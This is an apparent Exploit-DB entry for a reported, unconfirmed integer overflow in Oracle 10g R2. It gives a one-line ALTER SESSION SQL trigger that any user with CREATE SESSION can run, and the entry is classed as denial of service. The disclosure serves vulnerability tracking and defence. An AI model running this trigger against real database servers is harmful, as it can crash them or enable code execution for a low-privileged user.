Oracle 10g - Alter Session Integer Overflow

EDB-ID:

28293

CVE:

N/A

EDB Verified:

Author:

putosoft softputo

Type:

dos

Exploit:   /  

Platform:

Multiple

Date:

2006-07-27

Vulnerable App: 
source: https://www.securityfocus.com/bid/19201/info

Oracle 10g is reportedly prone to a integer-overflow vulnerability because the application fails to allocate a large enough data type to accommodate user-supplied input before using it in a query. This issue has not been confirmed.

An attacker could exploit this vulnerability to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely cause denial-of-service conditions.

Reports indicate that Oracle 10g R2 is vulnerable; other versions may also be affected.

Connect with any user with only CREATE SESSION
SQL> alter session set events '10046 trace name context forever, level 16';
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services